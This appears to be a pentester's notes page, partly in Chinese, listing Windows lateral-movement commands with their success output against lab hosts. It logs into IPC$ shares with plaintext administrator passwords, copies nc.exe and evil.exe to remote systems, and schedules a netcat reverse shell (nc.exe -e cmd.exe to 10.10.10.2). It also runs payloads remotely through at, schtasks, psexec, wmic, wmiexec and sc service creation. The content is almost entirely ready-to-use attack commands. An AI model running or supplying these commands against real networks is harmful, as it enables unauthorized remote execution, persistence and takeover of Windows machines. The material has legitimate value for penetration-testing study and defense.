1
2

System error 1312 has occurred.
A specified logon session does not exist. It may already have been terminated

1
2
3

C:\Users\evi1ox\Desktop>net use \\10.10.10.21\IPC$ 123456 /user:administrator
net use \\10.10.10.21\IPC$ 123456 /user:administrator
命令成功完成。

1
2
3

C:\Users\evi1ox\Desktop>copy nc.exe \\10.10.10.21\C$\
copy nc.exe \\10.10.10.21\C$\
已复制         1 个文件。

1
2
3

C:\Users\evi1ox\Desktop>copy \\10.10.10.21\C$\windows\system32\cmd.exe cmd.exe
copy \\10.10.10.21\C$\windows\system32\cmd.exe cmd.exe
已复制         1 个文件。

1
2
3
4
5

at \\10.10.10.21
net time \\10.10.10.21
copy evil.exe \\[HOST]\c$\windows\temp\evil.exe
at \\10.10.10.21 18:51 C:\\nc.exe -e cmd.exe 10.10.10.2 2333
at \\10.10.10.21 [id] /delete

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

命令
schtasks /create /s 10.10.10.19 /u Administrator /p x /ru "SYSTEM" /tn adduser /sc DAILY /st 19:39 /tr c:\\add.bat /F
结果
SUCCESS: The scheduled task "adduser" has successfully been created.

命令
schtasks /run /s 10.10.10.19 /u Administrator /p x /tn adduser
schtasks /delete /tn adduser /f /s [HOST]  # 清除 adduser
结果
SUCCESS: Attempted to run the scheduled task "adduser".

1
2

psexec \\10.10.10.19 C:\add.bat
psexec.exe \\[HOST] –accepteula -u [USERNAME] -p [PASSWORD] -c evil.exe

1
2

at \\10.10.10.19 20:09 srv.exe
telnet 10.10.10.19 5188(书上说端口是99,我看了看~~~其实是5188端口)

1
2
3

wmic /node:10.10.10.21 /user:administrator /password:123456 process call create C:\add.bat
wmic /node:[HOST] /user:administrator /p [PASSWORD] process call create c:\windows\temp\evil.exe
wmiexec.py administrator:password@10.10.10.21

1
2

cscript.exe //nologo wmiexec.vbs /shell 10.10.10.21 Administrator 123456
cscript.exe wmiexec.vbs /cmd 10.10.10.21 administrator 123456 "ipconfig"

1
2
3
4
5
6
7
8

(1). 系统权限(其中test为服务名)
 sc \\[HOST] create boom binpath= c:\evil.exe
 sc \\[HOST] start boom
 sc \\[HOST] delete boom

(2). 指定用户权限启动
 sc \\[HOST] create boom binpath= c:\evil.exe obj= [DOMAIN]\administrator passwrod= [PASSWORD]
 sc \\[HOST] start boom